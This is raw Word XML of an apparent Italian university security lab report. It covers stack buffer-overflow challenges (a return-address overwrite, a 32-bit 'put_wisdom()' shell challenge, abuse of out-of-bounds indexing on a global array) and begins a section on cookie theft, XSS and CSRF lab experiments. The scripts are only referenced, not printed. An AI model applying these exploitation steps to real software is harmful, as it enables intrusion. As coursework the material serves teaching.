            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="8" name="Immagin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24439" r="2093"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6659535" cy="2889311"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E112A0" w14:textId="0E2EAB8C" w:rsidR="001078DD" w:rsidRDefault="00C425F3" w:rsidP="00FE0097">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Andiamo quindi a costruire un payload </w:t>
      </w:r>
      <w:r w:rsidR="00D454E6">
        <w:t xml:space="preserve">che sovrascriva l’indirizzo di ritorno con il seguente: </w:t>
      </w:r>
      <w:r w:rsidR="00D454E6" w:rsidRPr="008D5973">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008D5973" w:rsidRPr="008D5973">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>0x555555555229”</w:t>
      </w:r>
      <w:r w:rsidR="00997507">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FF77CA">
        <w:t xml:space="preserve"> Lo script che genera tale payload </w:t>
      </w:r>
      <w:r w:rsidR="00617E34">
        <w:t xml:space="preserve">è presente nel file </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00617E34" w:rsidRPr="004466BB">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>gen_writeSecret</w:t>
        </w:r>
        <w:r w:rsidR="004466BB" w:rsidRPr="004466BB">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>Payload</w:t>
        </w:r>
        <w:r w:rsidR="00617E34" w:rsidRPr="004466BB">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00284453">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007B4008">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00284453">
        <w:t>Infine vediamo il risultato di tale operazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5479E27A" w14:textId="5C50BDB7" w:rsidR="001168B1" w:rsidRDefault="001078DD" w:rsidP="001168B1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="579D5E3D" wp14:editId="1A575258">
            <wp:extent cx="5191760" cy="3194435"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6350"/>
            <wp:docPr id="9" name="Immagin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9473" t="18123" r="17317" b="1749"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5283161" cy="3250673"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E1706" w14:textId="50F01433" w:rsidR="001168B1" w:rsidRDefault="001168B1" w:rsidP="001168B1">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc140165778"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.4 Challenge </w:t>
      </w:r>
      <w:r w:rsidR="00F4576E">
        <w:t>“put_wisdom()”</w:t>
      </w:r>
      <w:r w:rsidR="00D3624F">
        <w:t xml:space="preserve"> nella versione a 32 bit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="374FF61C" w14:textId="32F2298B" w:rsidR="00D3624F" w:rsidRDefault="00D3624F" w:rsidP="00D3624F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
      </w:pPr>
      <w:r>
        <w:t>attaccare "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri-Bold" w:hAnsi="Calibri-Bold" w:cs="Calibri-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>put_wisdom()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" nella versione a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri-Bold" w:hAnsi="Calibri-Bold" w:cs="Calibri-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>32 bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2073E31F" w14:textId="2349BA63" w:rsidR="00F75CAB" w:rsidRDefault="00F75CAB" w:rsidP="00F75CAB">
      <w:r>
        <w:t xml:space="preserve">Si procede nel modo del tutto analogo alla versione </w:t>
      </w:r>
      <w:r w:rsidR="00D26BDD">
        <w:t>64bit discussa nel capitolo [1.1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74058B95" w14:textId="30BAB8BE" w:rsidR="00D26BDD" w:rsidRDefault="00805094" w:rsidP="00F75CAB">
      <w:r>
        <w:t>Facendo le dovute modifiche derivanti le seguenti differenze tra l’architettura x</w:t>
      </w:r>
      <w:r w:rsidR="00695F71">
        <w:t>86 a 64 e 32 bit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24798406" w14:textId="6245F804" w:rsidR="00695F71" w:rsidRDefault="00695F71" w:rsidP="00695F71">
      <w:r>
        <w:t xml:space="preserve">1) In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri-Bold" w:hAnsi="Calibri-Bold" w:cs="Calibri-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>x86-32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, gli indirizzi sono di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri-Bold" w:hAnsi="Calibri-Bold" w:cs="Calibri-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">4 bytes </w:t>
      </w:r>
      <w:r>
        <w:t>invece che 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4316F366" w14:textId="1434D422" w:rsidR="00562F92" w:rsidRDefault="00695F71" w:rsidP="00695F71">
      <w:r>
        <w:t xml:space="preserve">2) Per trovare lo "offset" bisogna tener conto che il comportamento della </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri-Bold" w:hAnsi="Calibri-Bold" w:cs="Calibri-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">istruzione RET in x86-32 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è leggermente diverso da x86 a 64 bit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281858E8" w14:textId="06173348" w:rsidR="00695F71" w:rsidRDefault="00562F92" w:rsidP="00562F92">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00562F92">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DDB6184" wp14:editId="64706209">
            <wp:extent cx="4845132" cy="1409076"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="10" name="Immagine 10"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agramma&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId23"/>
                    <a:srcRect l="1072" t="3666" b="5556"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4884760" cy="1420601"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="008198E5" w14:textId="77777777" w:rsidR="00562F92" w:rsidRDefault="00562F92" w:rsidP="00562F92"/>
    <w:p w14:paraId="596E793E" w14:textId="27AA0CD9" w:rsidR="00E82DDD" w:rsidRDefault="00E82DDD" w:rsidP="00562F92">
      <w:r>
        <w:t xml:space="preserve">Andiamo a verificare </w:t>
      </w:r>
      <w:r w:rsidR="00F964B9">
        <w:t>la dimensione dell’offset individuando la stringa ciclica presente nel registro EIP</w:t>
      </w:r>
      <w:r w:rsidR="00745A14">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00503F64">
        <w:t xml:space="preserve"> Modifichiamo lo script utilizzato </w:t>
      </w:r>
      <w:r w:rsidR="000D02B2">
        <w:t xml:space="preserve">precedentemente per la versione 64 bit </w:t>
      </w:r>
      <w:r w:rsidR="00E5419A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C7230C">
        <w:t>settando l’architettura i386 , utilizzando una shell compatibile a 32 bit</w:t>
      </w:r>
      <w:r w:rsidR="00375DE3">
        <w:t xml:space="preserve">, modificando l’offset ricavato </w:t>
      </w:r>
      <w:r w:rsidR="00512EEA">
        <w:t>e l’indirizzo di ritorno.</w:t>
      </w:r>
      <w:r w:rsidR="005D7597">
        <w:t xml:space="preserve"> Di seguito viene presentato uno screen dell’elaborazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF95EC" w14:textId="179BFF55" w:rsidR="005D7597" w:rsidRDefault="005D7597" w:rsidP="00562F92">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65CF2D9F" wp14:editId="1034BDBD">
            <wp:extent cx="6614556" cy="3718515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Immagine 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212" cy="3735187"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="552335B4" w14:textId="5444A0FC" w:rsidR="00C667CE" w:rsidRDefault="0007089B" w:rsidP="00DD5066">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc140165779"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.5 Array globale</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="373B0931" w14:textId="178FE43F" w:rsidR="0007089B" w:rsidRDefault="00A2062E" w:rsidP="00912C1F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Un'altra vulnerabilità è legata all'array globale "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri-BoldItalic" w:hAnsi="Calibri-BoldItalic" w:cs="Calibri-BoldItalic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ptrs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r w:rsidR="00A562D5">
        <w:t>occorre fare in modo che il programma acceda al puntatore "p" invece che ai puntatori in "ptrs".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3390DF92" w14:textId="32A41BDF" w:rsidR="00A562D5" w:rsidRDefault="00EC1EA3" w:rsidP="00A562D5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Procediamo utilizzando il debugger </w:t>
      </w:r>
      <w:r w:rsidR="00491026">
        <w:t xml:space="preserve">per verificare la distanza </w:t>
      </w:r>
      <w:r w:rsidR="006B6439">
        <w:t xml:space="preserve">che </w:t>
      </w:r>
      <w:r w:rsidR="00F076D9">
        <w:t>intercorre fra ptrs e p.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC16BE4" w14:textId="77777777" w:rsidR="00C2144D" w:rsidRDefault="00B813F1" w:rsidP="00C2144D">
      <w:r>
        <w:t xml:space="preserve">Il programma prende in ingresso un intero </w:t>
      </w:r>
      <w:r w:rsidR="00A10806">
        <w:t xml:space="preserve">che utilizzerà come indice del vettore ptrs per svolgere la funzione desiderata. </w:t>
      </w:r>
      <w:r w:rsidR="00221BB0">
        <w:t>Considera</w:t>
      </w:r>
      <w:r w:rsidR="00C2144D">
        <w:t>ndo che:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B17151" w14:textId="0036DEE6" w:rsidR="00F076D9" w:rsidRDefault="00C2144D" w:rsidP="00C2144D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>"array[i]" equivale a</w:t>
      </w:r>
      <w:r w:rsidR="00503EEC">
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r>
        <w:t>"array + i*sizeof(array[0])"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC733F" w14:textId="26DE34A5" w:rsidR="00616585" w:rsidRDefault="00616585" w:rsidP="00616585">
      <w:r>
        <w:t xml:space="preserve">Per accedere al </w:t>
      </w:r>
      <w:r w:rsidR="00952127">
        <w:t xml:space="preserve">puntatore p allora andiamo </w:t>
      </w:r>
      <w:r w:rsidR="00BE1ABA">
        <w:t>calcoliamo l’indice com</w:t>
      </w:r>
      <w:r w:rsidR="002D0AF5">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00FF64FF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBD8E3C" w14:textId="7FC1EE5C" w:rsidR="00EA33C5" w:rsidRPr="002D0AF5" w:rsidRDefault="00000000" w:rsidP="00616585">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:f>
            <m:fPr>
              <m:ctrlPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
              </m:ctrlPr>
            </m:fPr>
            <m:num>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <m:t>ptrs-p</m:t>
              </m:r>
            </m:num>
            <m:den>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <m:t>4</m:t>
              </m:r>
            </m:den>
          </m:f>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="21"/>
            </w:rPr>
            <m:t>=711626678</m:t>
          </m:r>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="7B31348F" w14:textId="6DAC2671" w:rsidR="00EA33C5" w:rsidRDefault="00EA33C5" w:rsidP="00616585">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Tale operazione è stata eseguita nello script </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="004466BB">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          </w:rPr>
          <w:t>“</w:t>
        </w:r>
        <w:r w:rsidR="0055623C" w:rsidRPr="004466BB">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>script_DistanzaP.py</w:t>
        </w:r>
        <w:r w:rsidRPr="004466BB">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          </w:rPr>
          <w:t>”</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0055623C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F4E6C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">e il risultato è presente nel file </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="008F4E6C" w:rsidRPr="004466BB">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          </w:rPr>
          <w:t>“</w:t>
        </w:r>
        <w:r w:rsidR="008F4E6C" w:rsidRPr="004466BB">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          </w:rPr>
          <w:t>log.txt</w:t>
        </w:r>
        <w:r w:rsidR="008F4E6C" w:rsidRPr="004466BB">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          </w:rPr>
          <w:t>”</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DC2057">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71583E6F" w14:textId="12B23382" w:rsidR="00DC2057" w:rsidRDefault="00940DF3" w:rsidP="00940DF3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18550806" wp14:editId="4C08CF18">
            <wp:extent cx="6644005" cy="3735070"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="2" name="Immagin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4005" cy="3735070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D48B98F" w14:textId="19F1BF7A" w:rsidR="00EC0712" w:rsidRDefault="00517AE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Si può verificare il </w:t>
      </w:r>
      <w:r w:rsidR="00F75489">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>raggiungimento</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dell’obiettivo </w:t>
      </w:r>
      <w:r w:rsidR="00F75489">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>dalla stampa: “Achievement unlocked!”</w:t>
      </w:r>
      <w:r w:rsidR="00EC0712">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D270B9F" w14:textId="16C77F09" w:rsidR="00940DF3" w:rsidRDefault="009814EB" w:rsidP="002E22E3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc140165780"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="314EF74E" w14:textId="215B0A53" w:rsidR="00837CFA" w:rsidRDefault="00837CFA" w:rsidP="00837CFA">
      <w:r>
        <w:t>La sicurezza web è una preoccupazione importante per tutti i proprietari di siti web o di applicazioni online. Ci sono diverse minacce da tenere in considerazione, tra cui il furto dei cookie, che avviene quando un attaccante ruba i cookie di un utente per impersonare l'utente e accedere ai suoi dati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B50271" w14:textId="30E05C30" w:rsidR="00837CFA" w:rsidRDefault="00837CFA" w:rsidP="00837CFA">
      <w:r>
        <w:t>Gli attacchi XSS sono un'altra minaccia che sfrutta le vulnerabilità delle applicazioni web per iniettare codice dannoso all'interno delle pagine web visualizzate dall'utente. Questi attacchi possono consentire a un attaccante di rubare informazioni sensibili, come le credenziali di accesso dell'utente, o di eseguire azioni dannose sul sito web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B434B40" w14:textId="36780C06" w:rsidR="00837CFA" w:rsidRDefault="00837CFA" w:rsidP="00837CFA">
      <w:r>
        <w:t>Il CSRF è un altro attacco in cui l'attaccante sfrutta la fiducia dell'utente per effettuare operazioni dannose. In questo attacco, l'attaccante induce l'utente a eseguire un'azione sul sito web senza che l'utente ne sia consapevole. Ciò può comportare il trasferimento di fondi o l'invio di dati sensibili all'attaccante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ADB5D4" w14:textId="6FAAA260" w:rsidR="009814EB" w:rsidRDefault="00837CFA" w:rsidP="00837CFA">
      <w:r>
        <w:t>Per prevenire tali minacce, è importante implementare l'input validation per verificare che l'input fornito dall'utente sia corretto e sicuro. Ciò può prevenire attacchi di tipo SQL injection o altri tipi di attacchi che sfruttano input malevoli.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319C81E1" w14:textId="77777777" w:rsidR="006A253F" w:rsidRDefault="006A253F" w:rsidP="00837CFA"/>
    <w:p w14:paraId="23670D4B" w14:textId="3C3BF613" w:rsidR="006A253F" w:rsidRDefault="00C7231A" w:rsidP="00C7231A">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc140165781"/>
      <w:r>
        <w:t xml:space="preserve">2.1 Cross-Site </w:t>
      </w:r>
      <w:r w:rsidR="00CE00B1">
        <w:t>Request Forgery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (CSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="50AF2FFD" w14:textId="77777777" w:rsidR="009E186D" w:rsidRDefault="009E186D" w:rsidP="001734DE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Esperimento A: da www.csrflab-defense.com a www.csrflab-defense.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD0CDAE" w14:textId="77777777" w:rsidR="009E186D" w:rsidRDefault="009E186D" w:rsidP="001734DE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Esperimento B: da www.csrflab-attacker.com a www.csrflab-defense.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F8512" w14:textId="77777777" w:rsidR="009E186D" w:rsidRDefault="009E186D" w:rsidP="001734DE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Prima di seguire i due link, cercate di prevedere quali cookie verranno inviati nella</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0550DCEF" w14:textId="77777777" w:rsidR="009E186D" w:rsidRDefault="009E186D" w:rsidP="001734DE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>la richiesta HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B7FB1" w14:textId="77777777" w:rsidR="009E186D" w:rsidRDefault="009E186D" w:rsidP="001734DE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Perché alcuni cookie non vengono inviati in determinati scenari?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669163CB" w14:textId="68A551AD" w:rsidR="00C7231A" w:rsidRDefault="009E186D" w:rsidP="001734DE">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>In che modo i cookie SameSite possono aiutare un server a rilevare se una richiesta è cross-site?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FF8914" w14:textId="155D22D5" w:rsidR="001734DE" w:rsidRDefault="001734DE" w:rsidP="001734DE"/>
    <w:p w14:paraId="2E7CB4BE" w14:textId="57490181" w:rsidR="001734DE" w:rsidRDefault="00705CBF" w:rsidP="001734DE">
      <w:r>
        <w:t>Le richieste possono essere effettuate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDD1A78" w14:textId="4B551433" w:rsidR="00705CBF" w:rsidRDefault="00705CBF" w:rsidP="00705CBF">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
